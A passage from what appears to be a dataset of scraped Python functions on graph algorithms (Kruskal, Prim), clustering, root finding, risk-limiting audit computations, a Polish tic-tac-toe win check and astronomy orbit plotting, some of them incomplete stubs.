kx_im_max, error,\r\n show_progress=show_progress, grid_points=grid_points,\r\n iterations=iterations,\r\n reduction_factor=reduction_factor,\r\n plot_full_region=plot_full_region)\r\n \r\n # sort and remove \"repeats\" with opposite signs\r\n kx_list = sorted(kx_list, key=(lambda kx : abs(kx)))\r\n i=0\r\n while i < len(kx_list) - 1:\r\n if abs(kx_list[i] + kx_list[i+1]) <= 1e-6 * (abs(kx_list[i]) + abs(kx_list[i+1])):\r\n kx_list.pop(i)\r\n else:\r\n i += 1\r\n \r\n # Fix amplifying waves\r\n kx_list = [(-kx if (kx.imag < 0 or (kx.imag==0 and kx.real < 0)) else kx)\r\n for kx in kx_list]\r\n \r\n return kx_list", "def kruskal(Grafo,diferencia):\n edges = list()\n #print(diferencia,\"la diferencia\" )\n for i in range(len(Grafo)): # collect the edges in G\n for v,w in Grafo[i]:\n if (w!=-1):\n edges.append((i,v,w))\n # sort the edges in ascending order w.r.t weights in the edges\n edges.sort(key=lambda x: x[2])## se organiza por peso \n ans,sans = [ list() for i in range(len(Grafo)) ],0\n df = dforest(len(Grafo))\n i = 0\n contador=0\n while i!=len(edges):\n u,v,w = edges[i]\n if df.find(u)!=df.find(v):\n df.union(u,v)\n contador+=1\n if(contador==diferencia):\n #print (w,\"pinche w\")\n return w\n\n i += 1", "def _qt_radius_clustering_minimal(self, min_to_cluster, reduced, unassigned_orphans, cache, max_cycles):\n # Separating components and removing dominated indices reduced runtime on tbpb82 0.4@100% from 10s to 10ms.\n # Before removing dominated, tree_275 0.04@100% found a solution with score 4.0485 after 228k cycles. After, found it in 49k. After adding the second Counter to CoverManager, found it under 1k cycles. Each cycle was substantially slower, but the solution still was found ~1000x faster (ms instead of 20 min).\n out_of_range = reduced.copy()\n out_of_range[out_of_range != 0] = 1\n neighbors_of = {}\n for ind in self._not_ignored_inds:\n clstr_inds = np.nonzero(reduced[:,ind] == 0)[0]\n neighbors_of[ind] = set(clstr_inds)\n chsn_indices = set(self.index[name] for name in self.chosen)\n avail_indices = set(self.index[name] for name in self.available)\n num_not_ignored = len(self._not_ignored_inds)\n considered_nbrs, dominated_inds = self._remove_dominated_inds(neighbors_of, chsn_indices, avail_indices, out_of_range)\n # # Process depending on the run parameters\n cache['cycles_used'] = 0\n final_centre_inds, final_scores = [], []\n if min_to_cluster == num_not_ignored: # Critical percent equivalent to 100%\n # Can dramatically speed up the search by separating components\n component_inds = self._identify_components(neighbors_of)\n subset_cycles, cycle_rollover = None, 0\n for subset_indices in component_inds:\n subset_to_cluster = len(subset_indices)\n subset_chosen = chsn_indices & subset_indices\n subset_avail = avail_indices & subset_indices\n if max_cycles != None:\n subset_cycles = ceil(subset_to_cluster/float(min_to_cluster) * max_cycles) + cycle_rollover\n subset_centre_inds, subset_scores, subset_cycles_used = self._qt_radius_cluster_subset(subset_indices, subset_chosen, subset_avail, considered_nbrs, dominated_inds, subset_to_cluster, cache, subset_cycles, out_of_range)\n if subset_cycles_used == None or subset_cycles_used >= subset_cycles:\n cycle_rollover = 0\n else:\n cycle_rollover = subset_cycles - subset_cycles_used\n final_centre_inds.extend(subset_centre_inds)\n final_scores.extend(subset_scores)\n elif min_to_cluster == num_not_ignored - len(unassigned_orphans):\n # Can still use the component speedup in this case\n orphan_inds = set(unassigned_orphans)\n component_inds = self._identify_components(neighbors_of)\n subset_cycles, cycle_rollover = None, 0\n for subset_indices in component_inds:\n if max_cycles != None:\n subset_cycles = ceil(len(subset_indices)/float(min_to_cluster) * max_cycles) + cycle_rollover\n subset_to_cluster = len(subset_indices - orphan_inds)\n if subset_to_cluster == 0: # The entire subset is orphaned, so no centers can be found\n if max_cycles != None:\n cycle_rollover += subset_cycles\n continue\n subset_chosen = chsn_indices & subset_indices\n subset_avail = avail_indices & subset_indices\n subset_centre_inds, subset_scores, subset_cycles_used = self._qt_radius_cluster_subset(subset_indices, subset_chosen, subset_avail, considered_nbrs, dominated_inds, subset_to_cluster, cache, subset_cycles, out_of_range)\n if subset_cycles_used == None or subset_cycles_used >= subset_cycles:\n cycle_rollover = 0\n else:\n cycle_rollover = subset_cycles - subset_cycles_used\n final_centre_inds.extend(subset_centre_inds)\n final_scores.extend(subset_scores)\n else:\n # Can't split into components and guarantee optimal, as I can't predict which component should be allowed to miss some variants.\n # May be a way to remove some components from consideration, but likely requires running _qt_radius_cluster_subset() multiple times. May still be faster, so worth considering if more speed is actually useful here.\n # - All unassigned orphans are part of total_allowed_missed by definition. So all other clusters are only allowed to miss allowed_missed = total_allowed_missed - len(unassigned_orphans).\n # - The global optimal solution for some component is guaranteed to fall between the solution for that component finding 100% of variants, and the solution for that component finding len(component)-allowed_missed variants. If they are equal, that's the global optimal solution for that component, and it can be excluded from the combined run. If they're unequal, it was a waste of time and the component has to be included in the combined run.\n final_centre_inds, final_scores, _cycles_used = self._qt_radius_cluster_subset(set(neighbors_of.keys()), chsn_indices, avail_indices, considered_nbrs, dominated_inds, min_to_cluster, cache, max_cycles, out_of_range)\n alt_variants = []\n return final_centre_inds, final_scores, alt_variants", "def minimum_spanning_arborescence(sol):", "def solve(list_of_kingdom_names, starting_kingdom, adjacency_matrix, params=[]):\n\n #A = adjacency matrix, u = vertex u, v = vertex v\n def weight(A, u, v):\n return A[u][v]\n\n #A = adjacency matrix, u = vertex u\n def adjacent(A, u):\n L = []\n for x in range(len(A)):\n if A[u][x] > 0 and x != u and A[u][x] != 'x':\n L.insert(0,x)\n return L\n\n #Q = min queue\n def extractMin(Q):\n q = Q[0]\n Q.remove(Q[0])\n return q\n\n #Q = min queue, V = vertex list\n def decreaseKey(Q, K):\n for i in range(len(Q)):\n for j in range(len(Q)):\n if K[Q[i]] < K[Q[j]]:\n s = Q[i]\n Q[i] = Q[j]\n Q[j] = s\n\n #V = vertex list, A = adjacency list, r = root\n def prim(V, A, r):\n u = 0\n v = 0\n\n # initialize and set each value of the array P (pi) to none\n # pi holds the parent of u, so P(v)=u means u is the parent of v\n P=[None]*len(V)\n\n # initialize and set each value of the array K (key) to some large number (simulate infinity)\n K = [999999]*len(V)\n\n # initialize the min queue and fill it with all vertices in V\n Q=[0]*len(V)\n for u in range(len(Q)):\n Q[u] = V[u]\n\n # set the key of the root to 0\n K[r] = 0\n decreaseKey(Q, K) # maintain the min queue\n\n # loop while the min queue is not empty\n while len(Q) > 0:\n u = extractMin(Q) # pop the first vertex off the min queue\n\n # loop through the vertices adjacent to u\n Adj = adjacent(A, u)\n for v in Adj:\n w = weight(A, u, v) # get the weight of the edge uv\n\n # proceed if v is in Q and the weight of uv is less than v's key\n if Q.count(v)>0 and w < K[v]:\n # set v's parent to u\n P[v] = u\n # v's key to the weight of uv\n K[v] = w\n decreaseKey(Q, K) # maintain the min queue\n return P\n\n\n # graph is a list of kingdoms that previous i is the parent of j where j = i + 1 \n graph = prim(adjacency_matrix, list_of_kingdom_names, starting_kingdom)\n\n # key = parent, value = children\n g = {}\n\n for x in range(len(list_of_kingdom_names)):\n g[x] = []\n\n for x in range(len(graph)):\n for y in range(len(graph)):\n if x == graph[y]:\n g[x].append(y) \n\n\n def path(k):\n if not g[k]:\n return [k]\n\n lst = [k]\n\n for child in g[k]:\n lst += path(child) + [k]\n # print(lst)\n\n return lst\n\n\n full_path = path(starting_kingdom)\n\n # print(full_path)\n\n\n\n # return closed_walk, conquered_kingdoms", "def _G_to_km_on_basis_single_level(self, w, m):\n kB = self._sym.kBoundedSubspace(self.k,t=1)\n g = kB.K_kschur()\n mon = self.km()\n if m < w.length():\n return 0\n ans = self.zero()\n for la in Partitions(m, max_part = self.k):\n ans += g.homogeneous_basis_noncommutative_variables_zero_Hecke((la)).coefficient(w)*mon(la)\n return ans", "def rkm(X, init_W, s, plot_ax=None):\n\n #extract useful info from args\n N = X.shape[0]\n d = X.shape[1]\n NC = init_W.shape[0]-2\n\n #construct boundary matrix\n boundary = init_W[[0,NC+1],:]\n B=np.zeros([NC,d],float)\n B[[0,NC-1],:]=boundary\n\n #construct regularizer hessian\n AW = np.diag(np.ones(NC))+np.diag(-0.5*np.ones(NC-1),1)+np.diag(-0.5*np.ones(NC-1),-1)\n\n #compute initial labels\n XW_dst = distance.cdist(X,init_W,'sqeuclidean')\n u = XW_dst.argmin(1)\n\n #iterate the minimizer\n converged = False\n it = 0\n while(not converged):\n it = it+1\n #print('iteration '+repr(it))\n\n #compute cardinality\n W_card=np.zeros(NC+2,int)\n for i in range(NC+2):\n W_card[i] = np.sum(u==i)\n\n #compute centroid matrix\n C = np.ndarray([NC,d],float)\n for i in range(NC):\n C[i,:] = np.sum(X[u==i+1,:],0)\n\n #construct k-means hessian \n AX = np.diag(W_card[1:NC+1])\n\n #update waypoints\n W = np.matmul(np.linalg.pinv(AX+s*AW),C+0.5*s*B)\n W = np.vstack([boundary[0,:],W,boundary[1,:]])\n\n #compute new labels\n XW_dst = distance.cdist(X,W,'sqeuclidean')\n u_new = XW_dst.argmin(1)\n\n #check for convergence\n converged = not np.sum(u_new!=u)\n u=u_new\n\n #plot\n if(plot_ax is not None):\n pyplot.sca(plot_ax)\n pyplot.ion()\n pyplot.cla()\n pyplot.title('Annealing, s='+repr(s))\n pyplot.plot(X[:,0],X[:,1],'bo')\n pyplot.plot(W[:,0],W[:,1],'-ro')\n pyplot.axis('equal')\n\n pyplot.pause(1.0/60)\n \n return W, u", "def decide_k_min(self, H0_dist, Ha_dist, rnd_index):\r\n\r\n self.H0_dists.append(copy.deepcopy(H0_dist))\r\n self.Ha_dists.append(copy.deepcopy(Ha_dist))\r\n #print(\"Deciding kmin for round index\", rnd_index)\r\n\r\n # If you change the end bound to len(H0_dist) then that's an issue\r\n\r\n for k in range(self.round_sched[rnd_index] // 2 + 1, self.round_sched[rnd_index] + 1):\r\n #print(\"kmin?:\", k)\r\n LR_num = 0\r\n LR_denom = 0\r\n for i in range(k, len(H0_dist)):\r\n LR_num += Ha_dist[i]\r\n LR_denom += H0_dist[i]\r\n \r\n delta = 1\r\n\r\n # FOR METIS\r\n #if (LR_num + self.pr_Ha_sched[max(rnd_index-1, 0)])/ (LR_denom + self.pr_H0_sched[max(rnd_index-1, 0)])> 1 / self.alpha:\r\n\r\n # FOR ATHENA\r\n if LR_num / LR_denom > 1 / self.alpha and Ha_dist[k] > delta * H0_dist[k]:\r\n \r\n # The case of equality essentially only happens when both sides are 0. Then there's no harm\r\n # in calling it a kmin (since it necessarily won't contribute to the risk), in spite of the fact\r\n # that the ratio criterion cannot be satisfied because of division by zero.\r\n # GRANT COULD ALSO BE DENOM = 0 OR ALPHA NUM > DENOM short circuit\r\n\r\n\r\n\r\n # SENTINELS FOR WHEN THERE'S NO KMIN! if we get to the\r\n # end of the dist and there's no satisfaction just return SENTINEL\r\n\r\n # FOR MINERVA\r\n #if self.alpha * LR_num >= LR_denom:\r\n\r\n self.k_min_sched[rnd_index] = k\r\n\r\n cumulative_H0_sched = self.pr_H0_sched[max(rnd_index-1, 0)]\r\n cumulative_Ha_sched = self.pr_Ha_sched[max(rnd_index-1, 0)]\r\n\r\n self.pr_H0_sched[rnd_index] = LR_denom + cumulative_H0_sched\r\n self.pr_Ha_sched[rnd_index] = LR_num + cumulative_Ha_sched\r\n\r\n # FOR MINERVA\r\n self.risk_sched[rnd_index] = LR_denom / LR_num\r\n\r\n # FOR METIS\r\n #self.risk_sched[rnd_index] = self.pr_H0_sched[rnd_index] / self.pr_Ha_sched[rnd_index]\r\n return", "def kto_wygral():\n for x in range(0, ROZMIAR_PLANSZY):\n for y in range(0, ROZMIAR_PLANSZY):\n for kierunek in (\"poziom\", \"pion\", \"skos prawy\", \"skos lewy\"):\n iksy, kolka = sprawdz_linie((x, y), kierunek)\n if iksy == ile_do_wygranej:\n return X\n if kolka == ile_do_wygranej:\n return O\n return False", "def dpsearch(points,k):\n\t#M = k\n\tpoints = np.sort(points,axis=0)\n\tL = len(points)\n\tM = k\n\tT = list(np.zeros(M+1,dtype='int'))\n\tT[0] = 0\t#first threshold is by default always set to index 0 in trellis graph.\n\tT[M] = L \t#last threshold is by default always set to last number in input points.\n\ttrellis_value = np.full((M+1,L+1),np.inf)\n\ttrellis_backpointer = np.full((M+1,L+1),np.inf)\n\n\t# Stage 1: m=1\t\n\tfor l in range(1,L-M+2):\n\t\ttrellis_value[1][l] = ((l-0)/float(L))*np.var(points[0:l])\n\t\ttrellis_backpointer[1][l] = 0\n\n\t\n\tif(M>2):\n\t\t# Stage 2: m=2 to m=M-1\n\t\tfor m in range(2,M):\n\t\t\tfor l in range(m,L-M+m+1):\n\t\t\t\t#finding optimal path\n\t\t\t\tJ_min = np.inf\n\t\t\t\tJ_temp = np.inf\n\t\t\t\tfor i in range(m-1,l):\n\t\t\t\t\tJ_temp = trellis_value[m-1][i] + ((l-i)/float(L))*np.var(points[i:l])\n\t\t\t\t\tif J_temp < J_min:\n\t\t\t\t\t\tJ_min = J_temp\n\t\t\t\t\t\tptr = i\n\t\t\t\t\n\t\t\t\ttrellis_value[m][l],trellis_backpointer[m][l] = J_min,ptr\n\t\t\t\t\n\n\t# Stage 3: m=M\n\tm = M\n\tl = L\n\t#finding optimal path\n\tJ_min = np.inf\n\tJ_temp = np.inf\n\tfor i in range(m-1,l):\n\t\tJ_temp = trellis_value[m-1][i] + ((l-i)/float(L))*np.var(points[i:l])\n\t\tif J_temp < J_min:\n\t\t\tJ_min = J_temp\n\t\t\tptr = i\n\n\t\n\ttrellis_value[M][L] = J_min\n\ttrellis_backpointer[M][L] = ptr\n\t\n\t\n\t# Backtracking\n\tl = L\n\tm = M\n\twhile m>=2:\n\t\tT[m-1] = int(trellis_backpointer[m][l])\n\t\tl = int(trellis_backpointer[m][l])\n\t\tm = m - 1\n\n\t#Assign cluster labels\n\tlabels = np.full(len(points),0)\n\tj = T[0]\n\tcounter = 0\n\tfor i in range(1,k+1):\n\t\tlabels[j:T[i]] = counter\n\t\tj = T[i]\n\t\tcounter += 1\n\n\n\treturn labels,T", "def findminpath(tab, gxtab, gytab, pixtab):\n\n pathdist = 2 # the number of points each points on a ray can related to on the previous ray\n pathdist_penalty = 0.3 # penalty of the difference of the pathdist\n pathpix_penalty = 2 # penalty of the difference of pixel values between the point and the previous point\n nray = tab.shape[1]\n\n #tab = np.hstack((tab,tab[:, 0].reshape(tab.shape[0], 1)))\n #pixtab = np.hstack((pixtab,pixtab[:, 0].reshape(pixtab.shape[0], 1)))\n #gxtab = np.hstack((gxtab,gxtab[:, 0].reshape(gxtab.shape[0], 1)))\n #gytab = np.hstack((gytab,gytab[:, 0].reshape(gytab.shape[0], 1)))\n\n tab = np.hstack((tab,tab,tab)) # horizontally stack the tab matrix to prepare for the filtering on the result\n pixtab = np.hstack((pixtab,pixtab,pixtab))\n gxtab = np.hstack((gxtab,gxtab,gxtab))\n gytab = np.hstack((gytab,gytab,gytab))\n\n tab = (tab - tab.min()) / (tab.max() - tab.min()) # noralize the tab matrix\n pixtab = (pixtab - pixtab.min()) / (pixtab.max() - pixtab.min()) * -1 # for we want to find the white contour of the cell so we multipy -1 on the pixtab\n # tab = tab / np.median(tab)\n # pixtab = pixtab / np.median(pixtab)\n path = np.zeros(tab.shape)\n path[:, 0] = np.array(range(0, tab.shape[0]))\n score = np.zeros(tab.shape)\n score[:, 1] = tab[:, 1]\n\n for i in range(1, tab.shape[1]):\n for j in range(tab.shape[0]):\n mins = np.Inf # record the min value of the ray\n minat = 0\n for k in range(-pathdist, pathdist+1):\n if(0 <= (j+k) and (j+k) < tab.shape[0]):\n s = pixtab[j, i]\n pixdiff = abs(pixtab[j, i] - pixtab[j+k, i-1])\n s += pixdiff * pathpix_penalty # two kinds of penalty\n s += abs(k) * pathdist_penalty\n s += score[j+k, i-1]\n\n if(s < mins):\n mins = s\n minat = j + k\n path[j, i] = minat\n score[j, i]= mins\n\n start = int(np.argmin(score[:, -1]))\n path = path.astype(np.int32)\n minpath = [start]\n for i in range(tab.shape[1]-1, 0, -1):\n minpath.append(path[minpath[-1], i])\n minpath = minpath[::-1]\n # print(len(minpath))\n minpath = savgol_filter(minpath, 15, 3) # apply a Savitzky-Golay filter to the raw minpath signal\n minpath = minpath[nray:nray*2] # cut the middle part of minpath whose length is nray\n return np.array(minpath).astype(np.int32)", "def search_minimum_coloring(self,alpha,Beta):\n bestSol=[]\n bestK=0\n k= self.g.n\n iter = 0\n global encore\n encore = True\n timer = threading.Timer(200, findeboucle)\n timer.start()\n while(encore):\n tabus_search = self.compute_solution(k,alpha,Beta)\n if(tabus_search[1]==0):\n bestSol= copyMatrix(tabus_search[0])\n #tmax=tabus_search[2]\n bestK=k\n k=k-1\n return(bestK,bestSol)", "def Wygrana():\r\n for x in range (0, ROZMIAR_PLANSZY):\r\n for y in range (0, ROZMIAR_PLANSZY):\r\n for kierunek in (\"poziom\", \"pion\", \"skos prawy\", \"skos lewy\"):\r\n iksy, kolka = SprawdzLinie ((x, y), kierunek)\r\n if iksy == 5:\r\n return X\r\n if kolka == 5:\r\n return O\r\n return False", "def findroot(self,x0,method='fmin',**kwargs):\n return self._optimize(x0,'root',method,**kwargs)", "def ACM_Kruskal(G):\n pass", "def kruskal_solve(self):\n\n\t\tmin_span_tree = Graph(self.graph.vertices, [])\n\t\tedges = sorted(self.graph.edges[:], key=lambda x: x[2])\n\t\tcount = 0\n\n\t\twhile count < len(self.graph.vertices) - 1:\n\t\t\tcur_edge = edges[0]\n\t\t\tedges = edges[1:]\n\t\t\t\n\t\t\tnode1, node2, weight = cur_edge\n\t\t\tif not min_span_tree.is_connected(node1, node2):\n\t\t\t\tmin_span_tree.edges.append(cur_edge)\n\t\t\t\tcount = count + 1\n\n\t\treturn min_span_tree", "def guyan_forsparse(M, K, master=None, fraction=None):\n\n\n\tif master is None:\n\t\tif fraction is None:\n\t\t\tfraction = 0.25\n\n\t\tratios = np.diag(M) / np.diag(K)\n\t\tranked = [i[0] for i in sorted(enumerate(ratios), key=lambda x: x[1])]\n\t\tthresh = int(fraction * ratios.size)\n\t\tif (thresh >= ratios.size) or thresh == 0:\n\t\t\tprint(\"Can't keep\", thresh, 'DOFs.')\n\t\t\tprint(\"Fraction of\", fraction, \"is too low or too high.\")\n\t\t\treturn 0, 0, 0, 0, 0\n\n\t\tmaster = ranked[-thresh:]\n\n\tmaster = np.array(master)\n\n\tncoord = M.shape[0]\n\n\ti = np.arange(0, ncoord)\n\n\ti = i.reshape(1,-1)\n\n\ti = i + np.ones((1,i.shape[1]),int)\n\n\tlmaster = master.shape[1]\n\n\ti[0,master-1] = np.transpose(np.zeros((lmaster,1)))\n\n\ti = np.sort((i), axis =1)\n\n\tslave = i[0,lmaster + 0:ncoord]\n\n\tK= lil_matrix(K)\n\n\tslave = slave.reshape(1,-1)\n\n\tmaster = master-np.ones((1,master.shape[0]),int)\n\n\tmaster = master.ravel()\n\n\tslave = slave - np.ones((1,slave.shape[0]),int)\n\n\tslave = slave.ravel()\n\n\tkss = slice_forSparse(K, slave, slave)\n\n\tksm = slice_forSparse(K, slave, master)\n\n\tT= np.zeros((len(master)+len(slave), len(master)))\n\n\tT= lil_matrix(T)\n\n\tT[master,:lmaster] = sps.eye(lmaster,lmaster)\n\n\tT[slave,0:lmaster]=spla.spsolve(-kss,ksm)\n\n\tMred = T.T * M * T\n\n\tKred = T.T * K * T\n\n\treturn Mred, Kred, master", "def MinSpanningTreeKruskal(self):\n nodes = [n for n in self.nodes]\n edges = [e for e in self.edges]\n self.ResetGraph()\n for n in nodes:\n self.AddNode(n)\n n.neighbours = []\n\n \n edges.sort(key=lambda e: e.weight)\n \n for edge in edges:\n if not self.CausesCycleIfAdded(edge):\n self.ConnectByEdge(edge)\n if len(self.edges) == self.NodesCount()-1:\n break", "def sky_orbits(test=True):\n \n t = Table.read('/home/ana/data/baumgardt_positions.fits')\n \n ind_disterr = ~np.isfinite(t['e_Rsun'])\n t['e_Rsun'][ind_disterr] = 0.1 * t['Rsun'][ind_disterr]\n e_max = np.nanmax(t['e_Rsun'][~ind_disterr])\n ind_cap = t['e_Rsun']>e_max\n t['e_Rsun'][ind_cap] = e_max\n \n clusters = ['NGC 3201', 'NGC 4590', 'NGC 5824', 'NGC 5272', 'NGC 5139', 'NGC 5024']\n #clusters = ['NGC 5824', 'NGC 5024']\n N = len(clusters)\n \n match = dict()\n match['NGC 3201'] = dict(streams=['gjoll'], direction=[-1], nstep=[35], gc_label='NGC\\n3201', gcra_off=0*u.deg, gcdec_off=-13*u.deg, gcl_off=0*u.deg, gcb_off=-13*u.deg, stream_label=['$Gj\\\\\\\" oll$'], stream_ra=[-156*u.deg], stream_dec=[-4.5*u.deg], eq_angle=[-45*u.deg], stream_l=[-148*u.deg], stream_b=[-33*u.deg], gal_angle=[22*u.deg])\n \n match['NGC 4590'] = dict(streams=['fjorm'], direction=[1], nstep=[100], gc_label='NGC\\n4590', gcra_off=-15*u.deg, gcdec_off=0*u.deg, gcl_off=-13*u.deg, gcb_off=-10*u.deg, stream_label=['$Fj\\\\\\\" orm$'], stream_ra=[-22*u.deg], stream_dec=[66*u.deg], eq_angle=[35*u.deg], stream_l=[110*u.deg], stream_b=[50*u.deg], gal_angle=[-50*u.deg])\n \n match['NGC 5024'] = dict(streams=['sylgr', 'ravi'], direction=[-1, 1], nstep=[300,500], gc_label='NGC\\n5024', gcra_off=-15*u.deg, gcdec_off=0*u.deg, gcl_off=10*u.deg, gcb_off=-20*u.deg, stream_label=['Sylgr', 'Ravi'], stream_ra=[-70*u.deg, 83*u.deg], stream_dec=[2*u.deg, -47*u.deg], eq_angle=[25*u.deg, 65*u.deg], stream_l=[-110*u.deg, -18.5*u.deg], stream_b=[62*u.deg, -47*u.deg], gal_angle=[30*u.deg, -10*u.deg])\n \n match['NGC 5139'] = dict(streams=['fimbulthul'], direction=[-1], nstep=[70], gc_label='NGC\\n5139', gcra_off=-5*u.deg, gcdec_off=-15*u.deg, gcl_off=0*u.deg, gcb_off=-12*u.deg, stream_label=['Fimbulthul'], stream_ra=[-20*u.deg], stream_dec=[-15*u.deg], eq_angle=[0*u.deg], stream_l=[-20*u.deg], stream_b=[45*u.deg], gal_angle=[0*u.deg])\n \n match['NGC 5272'] = dict(streams=['svol'], direction=[1], nstep=[70], gc_label='NGC\\n5272', gcra_off=-15*u.deg, gcdec_off=10*u.deg, gcl_off=-23*u.deg, gcb_off=-17*u.deg, stream_label=['$Sv\\\\\\\" ol$'], stream_ra=[-2*u.deg], stream_dec=[34*u.deg], eq_angle=[-10*u.deg], stream_l=[55*u.deg], stream_b=[55*u.deg], gal_angle=[-65*u.deg])\n \n match['NGC 5824'] = dict(streams=['triangulum', 'turbio'], direction=[1,1], nstep=[700,1], gc_label='NGC\\n5824', gcra_off=15*u.deg, gcdec_off=-5*u.deg, gcl_off=15*u.deg, gcb_off=-5*u.deg, stream_label=['Triangulum', 'Turbio'], stream_ra=[152*u.deg, 130*u.deg], stream_dec=[32*u.deg, -51*u.deg], eq_angle=[-48*u.deg, 30*u.deg], stream_l=[120*u.deg, -82*u.deg], stream_b=[-31*u.deg, -57*u.deg], gal_angle=[70*u.deg, 105*u.deg])\n \n dt = 0.5*u.Myr\n wangle = 180*u.deg\n ra_off = 120*u.deg\n l_off = 0*u.deg\n \n colors = [mpl.cm.plasma(0.95*x/N) for x in range(N)]\n \n np.random.seed(27529)\n if test:\n Nsample = 1\n else:\n Nsample = 100\n \n plt.close()\n fig = plt.figure(figsize=(12,12))\n \n ax0 = fig.add_subplot(211, projection='mollweide')\n ax1 = fig.add_subplot(212, projection='mollweide')\n ax = [ax0, ax1]\n \n for i in range(N):\n #ind = t['Name']== clusters[i]\n ind = t['Name']==clusters[i]\n t_ = t[ind]\n \n c = coord.SkyCoord(ra=t_['RAJ2000'], dec=t_['DEJ2000'], distance=t_['Rsun'], pm_ra_cosdec=t_['pmRA_'], pm_dec=t_['pmDE'], radial_velocity=t_['RV'], frame='icrs')\n cgal = c.transform_to(coord.Galactic)\n #w0 = gd.PhaseSpacePosition(c.transform_to(gc_frame).cartesian)[0]\n \n color = colors[i]\n alpha_text = 0.8\n \n plt.sca(ax[0])\n plt.plot((c.ra + ra_off).wrap_at(wangle).rad, c.dec.rad, '+', color=color, mew=3, ms=15, label=t_['Name'][0])\n plt.text((c.ra + ra_off + match[clusters[i]]['gcra_off']).wrap_at(wangle).rad, (c.dec + match[clusters[i]]['gcdec_off']).rad, match[clusters[i]]['gc_label'], fontsize='small', ha='center', va='center', alpha=alpha_text)\n \n plt.sca(ax[1])\n plt.plot((cgal.l + l_off).wrap_at(wangle).rad, cgal.b.rad, '+', color=color, mew=3, ms=15, label=t_['Name'][0])\n plt.text((cgal.l + l_off + match[clusters[i]]['gcl_off']).wrap_at(wangle).rad, (cgal.b + match[clusters[i]]['gcb_off']).rad, match[clusters[i]]['gc_label'], fontsize='small', ha='center', va='center', alpha=alpha_text)\n \n\n for j in range(len(match[clusters[i]]['direction'])):\n # sample gc positional uncertainties\n for k in range(-1, Nsample):\n if k==-1:\n c = coord.SkyCoord(ra=t_['RAJ2000'], dec=t_['DEJ2000'], distance=t_['Rsun'], pm_ra_cosdec=t_['pmRA_'], pm_dec=t_['pmDE'], radial_velocity=t_['RV'], frame='icrs')\n w0 = gd.PhaseSpacePosition(c.transform_to(gc_frame).cartesian)[0]\n \n lw = 1.5\n alpha = 1\n else:\n c = coord.SkyCoord(ra=t_['RAJ2000'], dec=t_['DEJ2000'], distance=t_['Rsun'] + np.random.randn()*t_['e_Rsun'], pm_ra_cosdec=t_['pmRA_'] + np.random.randn()*t_['e_pmRA_'], pm_dec=t_['pmDE'] + np.random.randn()*t_['e_pmDE'], radial_velocity=t_['RV'] + np.random.randn()*t_['e_RV'], frame='icrs')\n w0 = gd.PhaseSpacePosition(c.transform_to(gc_frame).cartesian)[0]\n \n lw = 1\n alpha = 0.1\n \n orbit = ham.integrate_orbit(w0, dt=dt*match[clusters[i]]['direction'][j], n_steps=match[clusters[i]]['nstep'][j])\n orbit_eq = orbit.to_coord_frame(coord.ICRS, galactocentric_frame=gc_frame)\n orbit_gal = orbit.to_coord_frame(coord.Galactic, galactocentric_frame=gc_frame)\n \n \n plt.sca(ax[0])\n dra = (orbit_eq.ra+ra_off).wrap_at(wangle)[1:] - (orbit_eq.ra+ra_off).wrap_at(wangle)[:-1]\n if np.any(np.abs(dra)>180*u.deg):\n pos_break = dra>180*u.deg\n ind_break = np.argmax(pos_break)\n ipad = 1\n plt.plot((orbit_eq.ra+ra_off).wrap_at(wangle).rad[:ind_break-ipad], orbit_eq.dec.rad[:ind_break-ipad], '-', color=color, lw=lw, label='', alpha=alpha)\n plt.plot((orbit_eq.ra+ra_off).wrap_at(wangle).rad[ind_break+ipad:], orbit_eq.dec.rad[ind_break+ipad:], '-', color=color, lw=lw, label='', alpha=alpha)\n else:\n plt.plot((orbit_eq.ra+ra_off).wrap_at(wangle).rad, orbit_eq.dec.rad, '-', color=color, lw=lw, label='', alpha=alpha)\n \n plt.sca(ax[1])\n dl = orbit_gal.l.wrap_at(wangle)[1:] - orbit_gal.l.wrap_at(wangle)[:-1]\n if np.any(np.abs(dl)>180*u.deg):\n pos_break = dl>180*u.deg\n ind_break = np.argmax(pos_break)\n ipad = 1\n plt.plot((orbit_gal.l+l_off).wrap_at(wangle).rad[:ind_break-ipad], orbit_gal.b.rad[:ind_break-ipad], '-', color=color, lw=lw, label='', alpha=alpha)\n plt.plot((orbit_gal.l+l_off).wrap_at(wangle).rad[ind_break+ipad:], orbit_gal.b.rad[ind_break+ipad:], '-', color=color, lw=lw, label='', alpha=alpha)\n else:\n plt.plot((orbit_gal.l+l_off).wrap_at(wangle).rad, orbit_gal.b.rad, '-', color=color, lw=lw, label='', alpha=alpha)\n \n # add streams\n pkl = pickle.load(open('../data/streams/data_{:s}.pkl'.format(match[clusters[i]]['streams'][j]), 'rb'))\n cs = coord.SkyCoord(ra=pkl['dec'][0], dec=pkl['dec'][1], frame='icrs')\n cs_gal = cs.transform_to(coord.Galactic)\n \n plt.sca(ax[0])\n plt.plot((cs.ra+ra_off).wrap_at(wangle).rad, cs.dec.rad, 'o', color=color, ms=8, label=match[clusters[i]]['streams'][j])\n plt.text(coord.Longitude(match[clusters[i]]['stream_ra'][j]).wrap_at(wangle).rad, coord.Latitude(match[clusters[i]]['stream_dec'][j]).rad, match[clusters[i]]['stream_label'][j], fontsize='small', alpha=alpha_text, rotation=match[clusters[i]]['eq_angle'][j].value, ha='center', va='center')\n \n plt.sca(ax[1])\n plt.plot((cs_gal.l+l_off).wrap_at(wangle).rad, cs_gal.b.rad, 'o', color=color, ms=8, label=match[clusters[i]]['streams'][j])\n plt.text(coord.Longitude(match[clusters[i]]['stream_l'][j]).wrap_at(wangle).rad, coord.Latitude(match[clusters[i]]['stream_b'][j]).rad, match[clusters[i]]['stream_label'][j], fontsize='small', alpha=alpha_text, rotation=match[clusters[i]]['gal_angle'][j].value, ha='center', va='center')\n \n \n plt.sca(ax[0])\n plt.grid(ls=':')\n plt.xlabel('R.A. [deg]')\n plt.ylabel('Dec [deg]')\n\n plt.gca().xaxis.set_ticklabels([])\n \n xloc = coord.Longitude(np.arange(-150,180,30)*u.deg)\n xloc = np.delete(xloc, [3])\n yloc = coord.Latitude(5*u.deg)\n Nx = len(xloc)\n \n for i in range(Nx):\n plt.text(xloc[i].wrap_at(wangle).rad, yloc.rad, '{:.0f}$\\degree$'.format((xloc[i]-ra_off).wrap_at(wangle).degree), alpha=0.6, ha='center', va='center')\n \n \n plt.sca(ax[1])\n plt.grid(ls=':')\n plt.xlabel('Galactic longitude [deg]')\n plt.ylabel('Galactic latitude [deg]')\n \n plt.gca().xaxis.set_ticklabels([])\n \n xloc = coord.Longitude(np.arange(-150,180,30)*u.deg)\n xloc = np.delete(xloc, [2,3])\n yloc = 